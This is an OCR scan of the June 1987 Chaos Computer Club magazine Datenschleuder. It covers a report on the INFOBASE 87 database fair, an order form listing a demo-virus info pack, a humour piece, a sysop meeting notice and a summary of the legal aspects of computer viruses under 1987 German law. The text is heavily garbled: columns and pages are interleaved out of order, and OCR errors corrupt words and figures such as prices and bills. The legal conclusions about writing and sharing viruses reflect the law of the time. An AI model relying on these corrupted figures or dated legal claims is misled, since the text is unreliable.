Kopfzeile das Kürzel der Datenbank, die aktuelle Seiten¬
nummer und Anzahl der Folgeseilen (Gesamtseitenzahl) und
in der Fußzeile mögliche Sieuerfunktioncn.
Als Befehle stehen zur Verfügung: AZ = Anzeigen von Do¬
kumenten, EN = Ende der Recherche, EX = Wechsel zu
BRS/Search, ME = Auswahl-Eihstiegsmenü, MQ = Auswahl
Hier setzt auch die Kritik an: Informationen sollten nicht wegen
ihrer elektronischen Verfügbarkeit gesperrt werden dürfen.
Meist ist auch eine “nur“ Beschränkung von Datenbanken
ineffizient, da es einfach zu viele Verbreitungswege gibt Als
Beschränkungsmaßnahmen wurden in der Vergangenheit z.B.
spezielle Paßwörter an Ausländer, die damit nur beschränkten
Zugriff auf die Datenbank(-en) hatten.
DieNASAlegteeineLisievon Datenbanken mitausländischen
Nutzem an. Diese Datenbanken bekamen keine als “classified“
eüigesiuften Daten mehr von der NASA.
Auch bekamen Daienbankanbicier Besuch von Mitarbeitern
der DOD. CIA eic. Sie sollten ihre Kundenlisten herausrücken,
und bekanntgeben, wer sich für was interessiert Es wird
geschätzt, daß die bisherigen Zugangsbeschränkungen einen
wirtschaftlichen Schaden von 9 Milliarden Dollar = 200.000
Arbeitsplätze hinterlassen hat
Die Entwicklung in der B undesrepublik geht dahin, jedem den
Zugang zu Datenbanken zu gestatten, gleichzeitig jedoch auch
keinen “Freedom of Information Act“ als Gesetz einzuführen.
Footprini on ihe Desk
Mit diesem unübersetzbaren amerikanischen Idiom ist der
Platz auf dem Schreibtisch gemeint, den der Computer ein-
nimmt Ein Daienbankanbicier hat diesen “Footprini on the
Desk“ auf dem Schreibtisch seines Kunden.
Dieser Footprini kostet den Kunden einen nicht unbeträchtli¬
chen Betrag. Grob gesagt kostet eine Stunde Datenbankre¬
cherche zwischen 300 und 500 DM. Eine durchschniiüiche
Recherche ist mit 20-30 Min bei einem geübten Rechercheur
anzusetzen. Darin enthalten sein können die Datex-Gebühren
(kommt darauf an, wie teuer die Datenbank ist). Jedoch sind
nicht enthalten: Lohn-oder Gehallskosten (ein Spitzenkönner
auf diesem Gebiet kann durchaus noch einmal soviel (und
mehr) pro Stunde kosten), Amortisation der Hard- und Soft¬
ware u.ä.
Lohnen sich bei desen Preisen überhaupt Datenbanken?
Dr. Heinrich Ulmer (AUDI AG. Ingolstadt) stellte dazu am
Beispiel JURIS folgende Kosten-Nutzen-Rechnung auf:
früher: 20 x 1.5-2 Std. Bibliothek = 35 Std./Monat
+10 X 1 Std. Fahrzeit = 10 SidyMonat
45 Std./Monat
heute; 20 k 15-20 min JURIS Dialog = 6 Std./Monat
+20 X 15-20 min Bibliothek = 6 Std/Monat
+ 3x1 Std. Fahizcit = 3 Std./Monat
15 StdTMonat
Zeitdifferenz: 30 Std./Monat
30 X DM 130.- = DM 3900.-.
Demgegenüber stehen monatliche Kosten für JURIS:
Hardware-Kostenbeitrag
Wartung
Gebühren Bundespost
Gebühren JURIS
Sonstige Kosten
(z.B. Schulung, Information,
Material)
DM 300.-,
DM 100.-.
DM 500.-.
DM 600.-.
DM400.-.
DM 1900.-,
bjumero 21 - Juni 1987
‘^atcnäff|(eiihcr
des Sachgebietes - Informationsquelle,MB=Neue Suche, SOS
= Hilfstexte. Hilft das alles nichts, gibt es zwei weitere Mög¬
lichkeiten: Entweder SOS od^ der Griff zum B^elsmann
Sorgen-Telefon. Über den Bertelsmann-Host in Gütersloh gibt
es ein Gateway zu BRS (Host) in USA. Dort gibt es 140
Datenbanken zu den unterschic^ichsten Sachbgebieten, je¬
doch noch nicht mit MENTOR Unterstützung.
Bei der Bertelsmann Presse Konferenz wurde dann beides
vorgeführt, MENTOR wie auch BRS. Heraus kam, daß auch
der weltgrößte Medienkonzern nur mit Wasser, sprich 300
Baud Epson Koppler, kocht, ebenfalls auf Datex warten muß,
im übrigen aber etwas von PR verstehL
So nebenbei erfuhr man, daß bei der letzten Infobase jemand
erfolgreich den Bertelsmann-Leuten Über die Schulter ge¬
schaut hatte. Zwei Monate später rief die Post au und fragte, ob
es denn mormal sei, daß man jetzt so oft Datenbanken und
Mailboxen in Kanada benutzen wUrde. Im übrigen möge man
doch bitte die Rechnung über 16.(XX) DM begleichen. Die NUI
fand sich dann auch in einer Mailbox, und jemand wurde
dingfest gemacht, der gleich ein paar NUIs bei sich rumliegen
hatte. Der Nachweis, daß dieser Jemand die NUI auch genutzt
hau sei jedxh bei einem Telefonanschluß relativ schwierig.
Nähre Informationen (über Datenbanken, nicht über NUI’s)
bei: Bertelsmann Informaiions Service GmbH, Neumaikter
Straße 18, 8 München 80, Tel. 08943189-0, Telex: vbmue
523259.
Ebenfalls bei Bertelsmann kam die Sprache auf MEGADOC,
das ist die Gruner&Jahr-Datenbank (STERN-Archiv etc.). Für
Journalisten, die nicht dem Hause Gniner&Jahr angehören,
gibt esdie Möglichkeit derOfflinc-Rechcrche.d.h. man richtet
an C&J eine Daienbankanfrage (Herr Linau, Tel.:O40/4118'
2051). Die führen nach den Spezifikationen die Recherche
durch (DurchschnittlicheRecherche» 1 Std. Aufwand,etwa40
Seiten Textausdnjck = ca. 320 DM) und schicken dann das
Ergebnis an den Fragesteller.
Knowledge means money
Knowledge is power + Time is money = Knowledge means
money.
So faßt ChelleO’Connell, einzige Infoimations-Brokerin Buf¬
falos (USA) ihreXäiigkeitzusammen. Die USA sind das Land,
das am freizügigsten mit ihren Informationen umgeht Der
“Freedom of Information Act“ sichert jedem Weltbürger das
Recht zu, alle Daten einzusehen, die nicht geheim sind, dem
Datenxhutz unterliegen oder als sog. “propriatory informa-
tion“ eigentumsrechtlich geschützt sind.
Seit etwa 10 Jahren gibt es jedoch eine Diskussion in den USA
über Beschränkungen von Informationen, die Ausländer be¬
treffen.
0fltcn3tl)IcH&cr
Teilweise wurden bereits Westeuropäer von technischen Kon¬
ferenzen ausgeschlossen. Derlei Dinge zeichnen sich auch -
immer mal wieder • bei Datenbanken ab. Treibende Kraft ist
das Department of Defense (DOD; siehe auch Artikel “Me-
gaconirol“ in dei DATENSCHLEUDER Nr.20). Ein großer
Teil der US-amerikanischen Forschung wird vom DOD fi¬
nanziert Diese Machtposition wurde in der Vergangenheit oft
dazu genutzt die Forschung zu Geheimhaltung zu verpflichten.
Die Richtlinie NSDD 145 definiert “sensitive Daten“ als sol¬
che, deren Nutzen, Veränderung oder Zerstörung (negativen)
Einfluß auf die Entwicklung (in) den USA haben könnte. Die
US - Amerikaner haben schnell erkannt daß Datenbanken eine
vollkommen neue Qualität von Informationsbeschaffung be¬
deuteten. Die Folge war, daß viele Daten nur wegen ihrer
elektronischen Verfügbarkeit für geheim erklärt wurden.
Dagegen ist bei den CD-ROMs und der CD-I-Technik in¬
zwischen alles standardisiert Die Firmen Philips imd Sony
geben zusammen folgende “Bücher“ heraus, durch die Li¬
zenzen vergeben werden:
REDBOOK
Es beschreibt die physikalischen Spezifikationen der Compact
Disk.
YELLOW BOOK
Daiencodierung und Datenformate auf CD-ROM, Scramble-
Verfahren, Fehlereikennung und Korrektur.
GREEN BOOK
CD-I Hard- und Software-
Unter dem Namen “High Sierra Proposal“ wurde ein Text
bekannt, der über die Angaben im Yellow Book hinaus die
Volumen und Filestruktur der CD-Rom regelt. Die “High
Sierra Group“, so benannt nach dem Ort ihres ersten Zusam¬
mentreffens, ist ein Zusammenschluß von Firmen, die aktiv
oder passiv an der CD-ROM Entwicklung interessim sind.
Auch bei der Firma Hitachi (Rungedamm 2,2 HH 80, Tele.:
040/73411-214) wurden konkr^ Zahlen genannt. Die vier
CD-Player für den Computereinsatz, 3 Stand-Alone-and-
Beside Geräte und ein Einbaugerät für den IBM-AT (mit dem
Disk-ControllM* zu betreiben), sind für je 2.500 DM zu haben.
Sie lesen CD-ROMs mit 552 MB Speicherkapazität mit einer
Zugriffszeit von 0,5-1 Sekunde und einer Datenaustauschrate
von 176 KB/s. lEtachi gab zudem die CD-ROM Produk¬
tionskosten mit etwa 10.0(X) DM (sehr stark aufwandsabhän¬
gig) an. Da dann erst eine CD-ROM existiert und meist mehr
benötigt werdsn, gab man den weiteren Hinweis auf einen
Stückpreis von ca 20 DM. bei einer Auflage von l(X)0 Stück.
Seite 6
Nuiitcro 21 - Juni 1987
Seite 7
Somit Ersparnis monatlich ca DM 2CXX).-.
Die Deutsche Bundespost macht gerade “Klein-“ Benutzern
jedoch schnell einen Strich durch solch schöne Rechnungen.
Sie eritOhte zum l. April 87 die (Datex)Gebühren. Mit etwas
Kleingedrucktem wurde dem Benutzer der 50 (hzw. 75)
Sekunden-Takt miigeteilL
Die Zeitschrift PASS WORD (“Praxisberater für elektronische
Informationsbeschaffung“, Handelsblau Verlag, Postf, 1102,
Kas^enstr. 67,4 Düsseldorf 1, Tel. 0211/83880) berichtete
in ihrer Nr.5/87 übereineEUSIDIC-Uniersuchung über Preise
der Postverwaltungen in Europa für eine 20 min/llOO Baud-
Recherche bei einer kostenfreien Datenbank (z.B. ECHO):
Demnach ist die Bundesrepublik wirklich Spitzenreiter, di
teuerste Pflaster, Die Liste fingt an bei der Bundesrepublik mit
4,86 ECU (European Count but not ycl Cash Unit) an, und hört
auf bei Platz 16, Irland, 0,90 EKuh. Bei Europäischen Ver¬
bindungen werden wir (5,73 EQ) in einem spanneden Finish
I von Finnland (5,81 IQ) auf Platz zwo verwiesen.
Bei diesen Berechnungen ist die 1.April-Knebelung (und alle
dachten April, April...) noch nicht bwücksichtigl. Spätestens
seitdem waren wir wegen 800%-Verteuerung absoluter
Negativ-Spitzenreiter. Besonders begeistert Uber die Erhöhung
war man auf dem GENIOS-(Wirtschaflsdaienbanken)-Stand-
Die Damen und Herren sitzen in Düsseldorf in ihrem Büro,
blicken vom Screen auf, schauen aus dem Fenster und er-
bUcken ein Postgebäude, von dem bekannt ist. daß sich darin
derschwarzeKasten- auch PAD genannt- versteckt, um ab und
an mal wieder “Datex-P: Auslösung durch Gegenstelle“ ab-
zuseWeken. Nichizdesdotrotz macht der Gebührenzähler alle
50 Sekunden einenTick weiter, wahrscheinlich biszum 1.7.87.
Neuester Stand der Dinge ist , daß die DBP die Gebühren
wahrscheinlich zum 1.7.1987 wieder dem alten Zustand von
vor dem 1. April anpassen will.
CD-ROM, CD-I undWORM
Glaubt man den Herstellern, dann sind CD-ROMs die Renner
der Zukunft. Gleich mehrere Finnen stellten Anwendungen auf
diesem Gebiet vor.
Exemplarisch sei hier Bertelsmann genannt, die neben dem ja
schon bekannten “Wer liefert was?“, auch die Bibel, das Orts¬
und Straßenverzeichnis der DBP, und eine Pharmakologische
Datenbankauf CD-ROM verführten. Interessenten machte die
Bertelsmann Tochterflima BCB (Bertelsmann Computer Be¬
ratungsdienst GmbH, Heidenkampsweg 44, 2 HH 1, Tel.
(MO/23607167) das Ang^t einer Kompletüösung. Die Firma
Bertelsmann hat alle zur CD-ROM Produktion notwendigen
Fachleute und Produktionsstäuen, angefangen von der Ana¬
lyse des Problems über die Hard- und Softwarelösung bis zur
CD-Pioduktion und dem folgenden Vertrieb unter ihrem
Kpnzem-Dach. Der Kunde muß im Grunde nur noch das Geld
mitbringen.
Ebenfalls Bertelsmann zeigte einen WORM-(Wriie Once -
Read Many)-Speicher (200 MByte - 2 GByte). Im Gegensatz
2 b den CD-Roms gibt auf diesem Gebiet jedcKh noch keine
internationale Vereinbarung über das Speicherformal. Die
physikalischen Formate reichen von 5 1/4“ bis 14“, die Spei-
cherformaie von 200 MByte bis 4 GByte. Zudem gibt es viele
verschiedene Versionen der Technik,
Schön war die CD-I Anwendung, die in Ansätzen bei Hitachi
zu sehen war. CD-I sieht für Compact Disk Interactiv. Das
bedeutet, daß von dieser CD-I nicht nur Daten sondern auch
Ton, Bild und/oder Film geliefert wird. Hitachi zeigt eine
Demonstrations CD-ROM einer amerikanischen Enzyklopä¬
die, die schon sehr nahe an dieses Ziel herankam. Man sucht
nach einem bestimmten Stichwort, der Text wird angezeigt,
farbig unterlegt sind die Siichwone zu dem weitere Informa¬
tionen abrufbar. Zudem sind bei vielen Einträgen Bilder und
Ton abrufbar. So z.B, ist unter dem Süchwon “Bach“ eine
Lebens-und Werkbeschreibung abrufbar, die Abbildung einer
Partitur sowie ein dazu passender Ton-AusschnilL Bei
Schlachten wird dann ein Bild mit dem Schlachtverlauf und
einer passenden Schlachimusik geliefert. Noch weiter gehts
unter dem Stichwort DNA; Etwa ein Viertel des Screens wird
von einen um sich selbst rotierenden DNA-Molekül-
Ausschnittmodell eingenommen. Die Audio-Branche hat die¬
ses neue Spielzeug auch schon für sich entdeckt. Noch in
diesem Jahr sollen CD-Player auf den Markt kommen, die die
neuen Scheiben abspielen können, dann gibts 20 Minuten
Musikvideo auf CD.
Insgesamt war die INFOBASE 87 eine lohnende Messe - wenn
man sie sich leisten konnte: Der Eintritt von 50 DM für alle
Tage war sicherlich nicht der entscheidende Punkt, sondern die
Beiträge, die für die Symposien usw, gezahlt werden mußten,
wollte man an ihnen leilnehmen (z.B. 390 DM für eine Ta¬
gung). Die aber waren das eigentlich Interessante. Dort leime
man die Leute kennen, dort wurden Informationen und Er¬
fahrungen gleich gebündelt und durchaus kritisch weilerge¬
geben.
Das eigentliche Messegeschehen war mehr eine Ergänzung zu
den anderen Veranstaltungen. Dort wurden Einzefgcspräche
geführt, kamen Anwender mit Spezialproblemen zu den Da-
icnbankanbieiem. Es wurden sicherlich bei vielen die not¬
wendige Erkiärungsgespräche gefuhn. Andrerseits mußte sich
Z.B. ein JURIS-Boss auf dem Jurislensymposium gegen Kritik
vom Podium und aus dem Zuhöierkieis wehren. Auf der
ONUNE-Tagung wurde hart diskutiert, u.a. auch über Kids,
die leider von einem Zuhörer als “Feinde“ dargestellt wurden,
daß sie die Statistik verfälschten, wenn sie Datenbankenab¬
fragen starteten, die keinen wirtschaftlichen Recherchegrund
haben. Andererseits gab es vom Auditorium durchaus Zu¬
stimmung zu der Aufgabe gerade die Kids und Freaks als
Kunden von morgen heranzuziehen.
Die Firma “Wer liefert was?“ GmbH (Postfach 100549,2 HH
1, Tel. 040/251508-0) hatte nicht nur das Geld, sondern auch
die Idee und das Datenmaterial. Sie vertreibt schtm in der
zweiira Auflage (2000 SL; LAufl. 150 St.) ihr Buch auf
CD-ROM für jeweils 1.950 DM.
Schade, daß sich in vielen Fällen - wie meistens auf solchen
Messen - interessante Veranstaltungen Uberschnitten. Alles
kann man nicht sehen und aufnehmen, schon gar nicht in einem
solchen Text wiedergeben. Trozdem hoffe ich, daß der Bericht
dem Leser einige Aufschlüsse über die momentane Situation
auf dem ONLINE-Markt gegeben hat. und anregt, am Ball zu
bleiben.
A.Eichlo’
Seite 8
Numero 21 - Juni 1987
0nlcn^if|(ctti)rr
Globalbestellletzen Ausgabe Juni 19B7
Mit Erscheinen dieses Bestellfetzens verlieren alle alten Versionen ihre Gültigkeit. Wir bitten, künftig
nur noch den jeweils aktuellen Fetzen zu benutzen.
Die Datenschleuder
Die folgenden alten Ausgaben der Datenschleuder sind noch in unterschiedlicher
Stückzahl erhältlich. Bei der Bestellung gilt das Faustrecht, wer zuerst kommt, mahlt
zuerst Gehen mehr Bestellungen ein, als Restezemplare vorhanden sind, gihts
ersatzweise Aulhacker unserer Wahl.
Stückprei s Anzahl Summe
Datenschleuder 01 2.50
Der CCC stellt sich vor / Hardware für Hacker / Die Hacker - Hsmine —
Datenschleuder 02 2.50
H ack mal wieder / U ödem ohne 0 llenbarunsseid
Datenschleuder 03 2.50
Uessen 8t Prüien / BTS heisst Büdschirmtrix -
Datenschleuder 04 2.50
Telebor / öltrauollsländiges maximegalomanisches Wörterbuch aller Sprachen-
Datenschleuder 05/05 2.50
Computer Tutorial / Packet Radio -
Datenschleuder 08 2.50
Rat für Piraten / Postprüisatz f SchrumpkBIäh 8# Würfel --
Datenschleuder 09 / 10 2.50
DFÜ-Grunzlagen / CCC '84 - NacLlese -
Datenschleuder 11 / 12 2.50
Kennwort Hacklele / ComnutcrkriminaJitäl / Ans lut Amaleurlunk ?-
Datenschleuder 15 2.50
Wo bitte sibls ne NUI ? / Trara - die Post ist da! / WiKQ -
Datenschleuder 16 2.50
Hille Hacker/CCC - Satzuuz/NUl oft —--
Datenschleuder 17 2.50
CCC '86 / Computervirus 'Rush hour' / Kompromittierende Abslrahlung-
Datenschleuder 18 2.50
Compulervireu - Doknznentation / DPA hackt / Volkszähluna '87 -
Datenschleuder 19 2.50
CeBit / Art wer ? / Volksquäiuna/ Modem-Chips -
Datenschleuder 20 2.50
e/Erbsubstanz in der Rasterlahndune / Uaschinenpersoprülprogramm
Datenschleuder - Abos
Gelten für jeweils ein Chaos - Jahr und umlassen etwa acht Ausgaben, sofern nicht höhere Gewalt
anders entscheidet CCC - Mitglieder erhalten die DS automatisch, müssen also nicht abennieren,
düriens aber zwecks Aufbesserung unserer Kasse.
Sozialabo für Schüler, Studenten, Azubis, Renler, Wehrpflichtige, 30.00
Ersatzdienstler und sonst sozial Benachteiligte
Standardabo für Otto - Normaluser 60.00 _
Fördeiabo für Gutbetuchte 12 0.00 . I „ I.
1 Summe dieser Sette |
SnlciiSriilciilicr
Numero 21 - Juni 1987
Sehe 9
Stückt>Teis Anzahl Sümsie
Die Hackerblbel , Teil Eins 33.33 _
Das unentbehiliclie Nachschlagewerk für Hacker und solche,
die es werden wolleiL Teste von und für Hacker, Dokumentation,
Meinungen, Lebenshilfe, Lesespass. 1
Aus dem Inhalt; das Basic-Gefühl * Neues vom CCC * Der Code
des HaSpa - Coups * Computer & totalitärer Staat * Satelliten-
backing * und * und * und... *
260 Seiten Din A4 ISBN 3-922708-90-6 Grüner Zweig
Studie für den geplanten Computereinsatz der Fraktion
'Die Grünen' im Auftrag des Deutschen Bundestages
'Die Einlühnuig der Commiteneclmik gestaltet sich für die Grünen im
Bundestag so schwer, wie für andere der Ausstieg aus der Atomindnstrie.
Für beide geht es an die Strukturen.'
Rechtslibel für den richtigen Umgang mit der Polizei
und anderen Amtspersonen sotane InstitutiDneiL
Ein Ratgeber für Alle, die bei Wahrnehmung ihrer demo-
kratiscben Rechte den richtigen Umgang mit staatlichen
Organen üben wollen.
120 Seiten DIN A6 ISBN 3-88012-679-« VMB
7.50
5.00
Was Sie gegen Mikrozensus und VoUcszzätalimg 5.00
tun können.
Ein praktischer Ratgeber für aUe, die sich mit der Volks¬
zählung und den damit verbundenen Rechtsproblemen
heschäftigeiL
3DÖ Seiten DIN A6 2001 Verlag 18061
Inlopaket 1 - Computerviren - ■ 25.00 [
Eine Dokumentation von S.Wemery , die das Thema
Computeiviren ausiührlich beleuchtet Das Inlopaket
besteht aus einer MS-Dos Diskette 5 1/4" nüt einem ,
Demo-Virus sowie 100 kB Dokumemationsteite.
Aufbacker ‘Actatung, Abhörgelabr'
Din A4 - Bogen mit 64 Bäckern, ungeschnitten, postgelh
Summe dieser Seite
Bitte bei aUen Beslellunsen beachten: Alle Anträgen an den CCC etc. nicht zusammen mit der
Bestellung auf uns loslasscn. sondern mit getrennter Post schicken, das beschleunigt zumindest die
Bearbeitung der Bestellung. Beigelegter Rückumschlag beschleunigt noch mehr, wenn selbiger auch
noch ausreichend frankiert ist. kann es passieren, daO es teuflisch schnell gehL Manche Sachen sind
manchmal nicht vorrätig. Wir erfüllen dann die Bestellung soweit als möglich ond legen den Resl
zurück, bis Uaterial da ist Achtet bitte aul schönste Sonntagschrilt wenn Ihr Eure Adresse nicht mit
dem Drucker f Stempel anleitigt, wir haben keine Zeit dauernd mit den Fetzen in die Apotheke zu
rennen. Sendungen mit besonderer Versendongsform [ Einschreiben, Nachnahme, etc| werden von
uns grundsätzUch weder verschickt noch angenommen, es sind grundsätzlich nur di» im Bestellletzen
aulgeführten Zahlweisen zulässig.
Seite 10
Numero 21,- Juni 1987
i3niciiSi{)Icuiict
Betrag Summe
60.00 I
Mitgliedscbalt im Chaos Computer Club e.V.
Jahresbeitrag für Schüler, Studenten, pipapo
Jahresbeitrag für Otto Normaluser 120.00 |
Jahresbeitrag für besonders Finanzstarke (förderndes Mitglied) ab 240.00 |
Einmalige Verwaltungsgebühr bei Eintritt 20.00 |
Mitglieder des CCC erhalten automatisch die Datenschleuder zugesandt und sind aufgefordert, aktiv
an der Arbeit des Vereins leilzunehmen. Die Mitgliedschaft im CCC berechtigt zur Inanspruchnahme
verbilligter Accounts auf der INFEX - Mailbou sonne zum Zugriff auf die Clubbretter der CLINCH -
Matlbox. Für alle Veranstaltungen des CCC wird ermäßigter Eintritt gewährt.
Teilnabme an der INFEX - MailDox
Einnaaliga Eintragungsgebühr
Mindestnutzung pro Monat 8.00
Verbindungsgeböhr pro Minute 0.15
Jede versandte Nachricht 0.07
Datenbank, Telex, Intermail nach Nutzung
Die INFSX ist ein kommerzielles Mailboxssistern mit acht parallelen Ports, Ih. acht
Benutzer können parallel im System arbeiten utjd die GeoNet - Dienstleistungen nutzen,
zum Beispiel Datenbankdienste, Telexversand und - Empfang, IntermaU zu anderen
GeoNet - Boxen, von und nach BTX, etc. Die in der Box verursachten Gebühren werden
direkt mit dem CCC abgerechnet, wir geben alle Gebühren zum Selbstkostenpreis
weiter. Wer einen preiswerten Anschluß an die kommerzielle Mailboxszene sucht, ist
io.oo[
Die CLINCH - Mailbos ist ein iiich!komme.''sie!!es .MailboxprojeKt das yersurbt eine
preiswerte Alternative zu den kommerziellen Systemen zu sein. Eterzeit stehen ein
Telelon- und ein Datex-Pon zur Verfügung, die wahlweise genutzt werden können. Die
Leistungen der CLINCH - Box sind ein Subset der Leistungen von GeoNet - Boxen,
soweit dies auf einem MS-Dos - System machbar ist. Die Abrechnung der
Nuizungsbeiträge erfolgt direkt mit der CLINCH - Box. CCC - Mitglieder erhalten
Zugriff auf spezielle Bretter, die dem normalen Nutzer nicht zur Verfügung stehen. Der
CCC wickelt über die Box Koordinierungsaufgaben des Vorstands und der Redaktion
der Datenschleuder ab.
mit Infex bestens bedient.
Teilnahme an der CLINCH - Mailhox
Einmalige Eintragungsgebühr
Monatsgeböhr für Schüler etc.
Monatsgebühr lür Normaiverdiener
Intermail, Telex, etc
2.00
5.00
nach Nutzung
20.00 [
lie Smlciidd^Icubct
Numero 21 - Juni 1987
Seite 11
Seite 12
Numero 2] - Juni 1987
S0/(iiiirf)lcNl)cr
Historische Fehler
Das dezimale Zahlensystem enstand aus einem un¬
glücklichen Fehler unserer Weisen, die den Daumen
irrtümlich für einen Finger hielten, obwohl der
Schöpfer es tatsächlich so gemeint hatte, daß jede
Hand eine hexadezimale Zahl darstellt.
In der Schule werden uns bezugslose Betrach¬
tungsweisen aufgezwängt, wobei die Tatsache völ¬
lig außer acht gelassen wird, daß wir, als wir als
Kinder mit Bauklötzen spielten, eine natürliche Zu¬
neigung zu Stack-Operationen entwickelt haben. Je¬
des Kind kann uns triumphierend beweisen, daß nur
an der Spitze des Stack ordentliche Operationen
möglich sind, während der Zugriff auf den Stapel¬
boden Chaos verursacht.
Die Darstellung der Welt als unendliches Konti¬
nuum von Flicßkommazahlen ist eine weitere Zer¬
störung menschlicher Traditionen. Es hat niemals
Schwierigkeiten verursacht, einen Kuchen zwischen
drei Kindern zu teilen, bis uns die Mathelehrer ein-
tiichterten. daß jedes Kind ein unendliches Dezi¬
malbruchteil des Kuchen kriegen würde und die
Computer anfmgen, uns vorzurechnen, daß die Sum¬
me dieser drei Kuchen.stücke nicht den ganzen Ku¬
chen geben würde.
Anstatt sich mit der Lösung wirklicher Probleme zu
beschäftigen, ist der menschliche Mathematiker be¬
sessen von der Idee, irrationale Zahlen zu berechnen,
zum Beispiel die Zahl Pi. Für die alten Hebräer
reichte es völlig aus, Pi gleich drei zu setzen, um den
Zweiten Tempel zu bauen, und wenn man den ra¬
tionalen Bruch 355/113 benutzt, kann man Moskau
auf drei Meter genau lokalisieren.
Die Tatsache, daß der Computer die Welt als Menge
einzelner endlicher Ganzzahlen sieht, stellt eine
ständige Ursache für die Schwierigkeiten der Men¬
schen dar. Sie reden von Rundungsfehlem und kön¬
nen nicht verstehen, warum der IBM 4341 mit
Taylor-Erweiterung und doppeltgenauer Arithmetik
den Sinus von 2910 mit 49902.58337544370990
errechnet, wenn das eigentliche Ergebnis 0.5 lauten
müßte. I
Aus: Israel Uricli, 'REPTIL - promoting dialog bet-
ween humanoid and Computer’, The Journal of Forth
Application and Research, VOL.4/No.2
Deutsche Übersetzung: R.Schrutzki. Übernommen
aus CLINCH.
0 n(ciiSiI)lcMbcr
IFA Sysoptreffen
Zur Internationalen Funkausstellung in Berlin findet
ein internationales Sysoptreffen statt. Zwei Tage,
vom 29.08. bis 30.08.87, treffen sich Mailboxbe¬
treiber zum Information saustausch. Der IPN (Verein
von Sysops), CCC, CAC und BHP, gestalten unter
anderem das zweitägige Informations-und Ta¬
gungsprogramm. Veranstaltungsort ist der Meh¬
ringhof in Berlin.
Samstag, 28.08. ab 15 Uhr: Vorstellung von IPN,
Referate Uber diverse Netzkonzepte, ab 21 Uhr;
Internationale Hackerfete.
Sonntag, 30.08. ab 10 Uhr: Technische und recht¬
liche Beiträge (Femmelderecht, Presserecht u.a.),
weitere Mailboxkonzepte, Diskussionen bis löUhr.
Dienstag, 01.09. um 16 Uhr: Hackertreff am Post¬
stand. Klönschnack und Diskussionen mit Vertre¬
tern des Gelben Riesen.
Anmeldung bei; IPN - H.Nopper, BrasendorferStr.
20. D-1000 Berlin 44
Bitte gebt an mit wieviel Personen ihr kommt und
wieviel Schlafplätze wann gebraucht werden!
LS23
Numero 21 - Juni 1987
Seite 13
Real Programmers don’t use PASCAL
Rechtliche Aspekte von
Computer viren
Computerviren sind heute ein heiß diskutiertes The¬
ma. Sie waren Zentralthema auf dem CCC ’86,
dessen Dokumentation von Steffen Wemery in der
DATENSCHLEUDER 18 ahgedruckt wurde.
Wegen ihrer zunehmenden Brisanz sind Compu¬
terviren aber auch ein beliebtes Thema sowohl der
Computerfachpresse wie auch der allgemeinen Pres¬
se geworden. Hierbei geht es fast immer aus¬
schliesslich, oder doch ganz überwiegend, um die
rein technischen Fragen der Computetviren. Fragen
wie: Was ist ein Virus, wie wird er programmiert,
wie wird er angewendet, und, nicht zuletzt natürlich,
wie kann man sich vor Computerviren schützen.
Die Frage welche rechtlichen Konsequenzen sich
aus Programmierung, Anwendung etc. von Viren
ergeben kann, wird weitgehend unbeachtet gelassen
oder nur kurz und unvollständig am Rande behan¬
delt. Dies ist der Grund, warum ich eine Studie über
die rechtlichen Aspekte von Computerviren verfaßt
und, anläßlich des CCC-Virenforums Ostern ’87 ira
Brett Virenforum von CLINCH, veröffentlicht habe.
Da nicht jeder die Möglichkeit hat, sich dort den Text
per download herauszuziehen, ein Abdruck des
Textes bei einer Länge von knapp 60 kB den Umfang
der vorliegenden DATENSCHLEUDER aber ge¬
sprengt hätte, ist es vorgesehen, die Studie in der
voraussichtlich im Herbst erscheinenden HAC¬
KERBIBEL, Teil 2, abzudrucken.
Wegen des großen Interesses, gerade unter den Pro¬
grammierern von Vlrasprogrammen, aber schon
hier die wichtigsten Ergebnisse in stark gekürzter
Fassung:
1. Entwicklung von Virusprogrammen.
Die Entwicklung und Programmierung von Vini-
sprogrammen als solche ist grundsätzlich rechtlich
unbenklich.
2. Einsatz von Vimsprogrammen
Viren nisten sich in noch unverseuchte Programme
ein. Ein bisher unverseuchtcs Programm, das von
einem Virus befallen wird, wird daher durch den
Virusbefall verändert, selbst wenn das Programm
weiterhin fehlerfrei läuft und auch ein sonstiger
Schaden nicht eintritt oder feststellbar ist. Die Ver-
ändemng von fremden Daten (und Programme sind
natürlich auch Daten!) ohne Einwilligung des Be¬
rechtigten reicht aber für den Tatbestand des 303a
StGB (Datenveränderung) aus, soweit die Tat vor¬
sätzlich erfolgte. Die Datenveränderung nach 303a
StGB kann mit bis zu 2 Jahren Freiheitsstrafe oder
Geldstrafe geahndet werden.
Jedenfalls bei vorsätzlichem Viruseinsatz ist für den
entstandenen Schaden Ersatz zu leisten. Hierbei
können leicht unüberschaubare Summen Zustande¬
kommen, die kein Schädiger zu Lebzeiten mehr
vollständig abtragen kann! Soweit die Schädigung
nur fahrlässig erfolgte, ist die rechtliche Situation
problematisch. Vgl. hierzu den Volltext in CLINCH
oder der HACKERB IB EL. Teil 2.
3. Weitergabe von Virusprogrammen
Grundsätzlich spricht nichts dagegen, Viruspro-
gramme im Quellcode oder als lauffähige Version,
an Dritte weiter zu geben. Aber Vorsicht!!! Wennder
Abnehmer des Virusprogramms das Programm in
strafbarer Weise einsetzt, kann sich auch der Pro¬
grammierer strafbar machen. Z.B. nämlich wegen
Anstiftung dann, wenn er (möglicherweise nur in
versteckter Form) dem Abnehmer den Vorschlag
gemacht hat, das Programm in strafbarer Weise
cinzusetzen. Oder wegen Beihilfe, wenn der Pro¬
grammierer Anhaltspunkte dafür hatte, daß der Ab¬
nehmer des Programms dies zu einer Straftat ein-
setzen würde.
In diesen Fällen würde der Programmierer auch
zivilrechtlich für den entstandenen Schaden (mit-
)haften. Und zwar in voller Höhe!
4. Veröffendichung von Virusprogrammen
Auch die Veröffentlichung von Virusprograinmcn,
Z.B. in Mailboxen oder Zeitschriften, ist ebenfalls
grundsätzlich unbedenklich möglich. Aber auch hier
ist dennoch Vorsicht geboten! Wenn mit der Ver¬
öffentlichung die (evtl, nur versteckte) Aufforde¬
rung verbunden wird, den Virus in strafbarer Weise
einzusetzen, kommt eine Strafbarkeit wegen öf¬
fentlicher Aufforderung zu Straftaten (111 StGB) in
Betracht. Dies hätte auch zur Folge, daß zivilrecht¬
lich für einen entstandenen Schaden mitgehaftei
würde. Weiter kommt unter bestimmten Umständen
eine Haftung auf Schadensersatz auch dann in Be¬
tracht, wenn der Empfänger des Virasprogramms
sich aufgrund unterbliebener oder unzureichender
Aufklärung, durch unsachgemäße Handhabung des
Virusprogramms, selbst schädigt.
